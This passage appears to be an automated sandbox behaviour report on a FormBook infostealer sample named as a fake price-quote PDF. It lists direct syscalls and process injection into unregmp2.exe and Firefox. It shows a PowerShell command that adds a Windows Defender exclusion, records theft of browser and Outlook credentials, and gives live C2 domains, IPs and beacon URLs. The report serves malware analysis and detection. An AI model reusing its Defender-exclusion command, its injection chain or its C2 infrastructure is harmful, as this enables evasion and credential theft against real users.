Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtOpenSection: Direct from: 0x77542E0C Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtAllocateVirtualMemory: Direct from: 0x775448EC Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtSetInformationThread: Direct from: 0x775363F9 Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtQuerySystemInformation: Direct from: 0x775448CC Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtClose: Direct from: 0x77542B6C
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtReadVirtualMemory: Direct from: 0x77542E8C Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtCreateKey: Direct from: 0x77542C6C Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtSetInformationThread: Direct from: 0x77542B4C Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtQueryAttributesFile: Direct from: 0x77542E6C Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtAllocateVirtualMemory: Direct from: 0x77543C9C Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtCreateUserProcess: Direct from: 0x7754371C Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtQueryInformationProcess: Direct from: 0x77542C26 Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtResumeThread: Direct from: 0x77542FBC Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtWriteVirtualMemory: Direct from: 0x7754490C Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtDelayExecution: Direct from: 0x77542DDC Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtAllocateVirtualMemory: Direct from: 0x77542BFC Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtReadFile: Direct from: 0x77542ADC Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtQuerySystemInformation: Direct from: 0x77542DFC Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtResumeThread: Direct from: 0x775436AC Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtNotifyChangeKey: Direct from: 0x77543C2C Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtCreateMutant: Direct from: 0x775435CC Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtWriteVirtualMemory: Direct from: 0x77542E3C Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe NtMapViewOfSection: Direct from: 0x77542D1C Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Memory written: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: NULL target: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: NULL target: C:\Windows\SysWOW64\unregmp2.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: NULL target: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: NULL target: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\unregmp2.exe Thread register set: target process: 7852 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\unregmp2.exe Thread APC queued: target process: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe" Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process created: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe" Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process created: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe" Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process created: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe" Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe Process created: C:\Windows\SysWOW64\unregmp2.exe "C:\Windows\SysWOW64\unregmp2.exe" Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: owYCvHvzfwuh.exe, 00000008.00000002.3778768329.0000000001461000.00000002.00000001.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 00000008.00000000.1466864725.0000000001461000.00000002.00000001.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000000.1609697544.0000000000FD1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: owYCvHvzfwuh.exe, 00000008.00000002.3778768329.0000000001461000.00000002.00000001.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 00000008.00000000.1466864725.0000000001461000.00000002.00000001.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000000.1609697544.0000000000FD1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: owYCvHvzfwuh.exe, 00000008.00000002.3778768329.0000000001461000.00000002.00000001.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 00000008.00000000.1466864725.0000000001461000.00000002.00000001.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000000.1609697544.0000000000FD1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: owYCvHvzfwuh.exe, 00000008.00000002.3778768329.0000000001461000.00000002.00000001.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 00000008.00000000.1466864725.0000000001461000.00000002.00000001.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000000.1609697544.0000000000FD1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Queries volume information: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.3781878826.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1542475565.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3779603566.0000000004B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3779712875.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3779117946.0000000003600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1543709314.00000000027F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\unregmp2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\unregmp2.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.3781878826.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1542475565.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3779603566.0000000004B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3779712875.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3779117946.0000000003600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1543709314.00000000027F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1466660 Sample: Fiyat ARH-4309745275.pdf240... Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 39 www.evertudy.xyz 2->39 41 xiaoyue.zhuangkou.com 2->41 43 19 other IPs or domains 2->43 53 Snort IDS alert for network traffic 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 Multi AV Scanner detection for submitted file 2->57 61 7 other signatures 2->61 10 Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe 4 2->10         started        signatures3 59 Performs DNS queries to domains with low reputation 39->59 process4 file5 37 Fiyat ARH-43097452...13u40000876.exe.log, ASCII 10->37 dropped 65 Adds a directory exclusion to Windows Defender 10->65 67 Injects a PE file into a foreign processes 10->67 14 Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe 10->14         started        17 powershell.exe 7 10->17         started        19 Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe 10->19         started        21 Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe 10->21         started        signatures6 process7 signatures8 77 Maps a DLL or memory area into another process 14->77 23 owYCvHvzfwuh.exe 14->23 injected 26 conhost.exe 17->26         started        process9 signatures10 63 Found direct / indirect Syscall (likely to bypass EDR) 23->63 28 unregmp2.exe 13 23->28         started        process11 signatures12 69 Tries to steal Mail credentials (via file / registry access) 28->69 71 Tries to harvest and steal browser information (history, passwords, etc) 28->71 73 Modifies the context of a thread in another process (thread injection) 28->73 75 3 other signatures 28->75 31 owYCvHvzfwuh.exe 28->31 injected 35 firefox.exe 28->35         started        process13 dnsIp14 45 www.evertudy.xyz 203.161.49.220, 49735, 49736, 49737 VNPT-AS-VNVNPTCorpVN Malaysia 31->45 47 parkingpage.namecheap.com 91.195.240.19, 49719, 49720, 49721 SEDO-ASDE Germany 31->47 49 8 other IPs or domains 31->49 51 Found direct / indirect Syscall (likely to bypass EDR) 31->51 signatures15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
35.227.248.111
 www.luo918.com United States
15169 GOOGLEUS false
66.235.200.146
 stefanogaus.com United States
13335 CLOUDFLARENETUS true
23.111.180.146
 www.highwavesmarine.com United States
29802 HVC-ASUS true
103.197.25.241
 dxgsf.shop Hong Kong
55933 CLOUDIE-AS-APCloudieLimitedHK true
208.91.197.27
 www.thesprinklesontop.com Virgin Islands (BRITISH)
40034 CONFLUENCE-NETWORK-INCVG true
109.95.158.122
 mocar.pro Poland
48896 DHOSTING-ASWarsawPolandPL true
203.161.49.220
 www.evertudy.xyz Malaysia
45899 VNPT-AS-VNVNPTCorpVN true
91.195.240.19
 parkingpage.namecheap.com Germany
47846 SEDO-ASDE true
47.239.13.172
 xiaoyue.zhuangkou.com United States
20115 CHARTER-20115US true
212.227.172.254
 www.ennerdaledevcons.co.uk Germany
8560 ONEANDONE-ASBrauerstrasse48DE true

Contacted Domains

Name IP Active
mocar.pro 109.95.158.122 true
www.highwavesmarine.com 23.111.180.146 true
www.thesprinklesontop.com 208.91.197.27 true
parkingpage.namecheap.com 91.195.240.19 true
www.ennerdaledevcons.co.uk 212.227.172.254 true
dxgsf.shop 103.197.25.241 true
stefanogaus.com 66.235.200.146 true
www.luo918.com 35.227.248.111 true
xiaoyue.zhuangkou.com 47.239.13.172 true
www.evertudy.xyz 203.161.49.220 true
www.fungusbus.com unknown unknown
www.newzionocala.com unknown unknown
www.dennisrosenberg.studio unknown unknown
www.shoplifestylebrand.com unknown unknown
www.qe1jqiste.sbs unknown unknown
www.mocar.pro unknown unknown
www.dxgsf.shop unknown unknown
www.neworldelectronic.com unknown unknown
www.stefanogaus.com unknown unknown
www.artemhypnotherapy.com unknown unknown
www.todosneaker.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.evertudy.xyz/csr7/ true
  • Avira URL Cloud: safe
 unknown
http://www.ennerdaledevcons.co.uk/4ksh/?hH=URmoC5X4e6K7wlVx2KbqE9eRaPOmGfPMOnoqB8M3F0zECWK+Sf67ndIbG8DedkN4mAzPYnwe388RaOdlDVpfeljRUUit0IJ1LO15UdugXJNJJasE4A==&4Z=FRPPB0TP0VK82R4 true
  • Avira URL Cloud: safe
 unknown
http://www.highwavesmarine.com/vpfr/?4Z=FRPPB0TP0VK82R4&hH=YJOYlkuNdHbUbxIU0duDsGwGBWmXVvvP+a5ZIsJaJ66fRzvfH4BZf/UT7tP0StNW9dLVB8Be+XMnEr4f4IOQu0h2rMKukEsZCuMbbpIHNAKNxYQHAA== true
  • Avira URL Cloud: safe
 unknown
http://www.thesprinklesontop.com/n12h/?hH=RL7POCi4RQwOAHw5RpRi0oRkNrFJHCE4O3Q4e5XJ1RgvJteO2OLpaAwWvE/Xee8N43HhgIeZk31xLdwZ5MBNlQw99SDhk98goSWR9PKXD7QtbF+D/w==&4Z=FRPPB0TP0VK82R4 true
  • Avira URL Cloud: safe
 unknown
http://www.artemhypnotherapy.com/9285/ true
  • Avira URL Cloud: safe
 unknown
http://www.qe1jqiste.sbs/2dv8/?hH=psGgeTZm92uMMjwvw3+ekktQKHQr8PtkyzA1wjnO7+NPXjQAxvdC6xrXVCGmGkxqQ5F0SN4BIMC+q/QNsQX26bwEMBx8euROh9Q+/yWsNbYiwZzEkA==&4Z=FRPPB0TP0VK82R4 true
  • Avira URL Cloud: safe
 unknown
http://www.stefanogaus.com/0rsk/ true
  • Avira URL Cloud: safe
 unknown
http://www.dxgsf.shop/vfca/?hH=PjuNaM4rErgNDqYdGwCHqm/mvS3xhxVRtMFmVQvGZApPshrl2us8sSNvZzeSfqXaMpgL6dVjOwb89B84ObwJ1CB2sMjpnb8Z8ua1HdSGi7DVkOqV+A==&4Z=FRPPB0TP0VK82R4 true
  • Avira URL Cloud: safe
 unknown
http://www.dennisrosenberg.studio/gvk0/?4Z=FRPPB0TP0VK82R4&hH=PBk/k+wnSgDApBLvvStJ1Qfqn2+N7jbU3UJKISJwHJXOTy3qrqzF3aeAlE7aotAu8uhq4eiBm9zMPuEZ1b+PfRrn1v/W9n6lJorEOJ3pO998ixm+1g== true
  • Avira URL Cloud: safe
 unknown
http://www.qe1jqiste.sbs/2dv8/ true
  • Avira URL Cloud: safe
 unknown
http://www.stefanogaus.com/0rsk/?hH=VoD++N0hxznoRAwvUr4uLQfJYOkKZkNbUm2XKd+d5dQonHhfXy1Wde6i6X/1IJHjaG3HR8hpE35h9XRxGXBI9lLHHMR3rtgWi8G/40reX/Z08eN34A==&4Z=FRPPB0TP0VK82R4 true
  • Avira URL Cloud: safe
 unknown
http://www.luo918.com/qmv1/?hH=70iXdBj3vvgYA1qv9X+C2v5f15BZXYNXgOSbaBLZsvX+/zBEWaSfpSSmWx4BVFALB6Pvk4Cj2RW76gyU8dG7au3WOdqnwjndnKZaLflLsZKJNqTutg==&4Z=FRPPB0TP0VK82R4 false
  • Avira URL Cloud: safe
 unknown
http://www.mocar.pro/prg5/?hH=OUWlBSduFOmbWHHx1+vrCN7lKThtnpeA9WltEIwOsC9+Rnf1YsqGBMTu+SXEa1SqJjg2e+xS43eh4+WwnjHBZw687TI9hNY/lW63YeurSsH96+kXOg==&4Z=FRPPB0TP0VK82R4 true
  • Avira URL Cloud: safe
 unknown
http://www.luo918.com/qmv1/ false
  • Avira URL Cloud: safe
 unknown
http://www.evertudy.xyz/csr7/?hH=IuYwVr8nXepE7mYHSf+gGVghE+QsK0Y2QdUzXudSXEAptekBSDag4n7LIWAgnje27+AV9TSqmFigDMavfH+dGRiAFdG+fcQhNs0c0ksUo3k2Pm5jlw==&4Z=FRPPB0TP0VK82R4 true
  • Avira URL Cloud: safe
 unknown
http://www.dxgsf.shop/vfca/ true
  • Avira URL Cloud: safe
 unknown
http://www.mocar.pro/prg5/ true
  • Avira URL Cloud: safe
 unknown
http://www.ennerdaledevcons.co.uk/4ksh/ true
  • Avira URL Cloud: safe
 unknown
http://www.fungusbus.com/dmjt/ true
  • Avira URL Cloud: safe
 unknown
http://www.thesprinklesontop.com/n12h/ true
  • Avira URL Cloud: safe
 unknown
http://www.dennisrosenberg.studio/gvk0/ true
  • Avira URL Cloud: safe
 unknown
http://www.fungusbus.com/dmjt/?hH=phzqshWM8++lNTZcZDn6PlPBsxjNAhN5IKmoEk/tfOScWWQLgCWtTff73plV+RjstliAOCijSwUPjuCIutjnDtcmXgVOIWaf4rR9wPyv60N+q1PahQ==&4Z=FRPPB0TP0VK82R4 true
  • Avira URL Cloud: safe
 unknown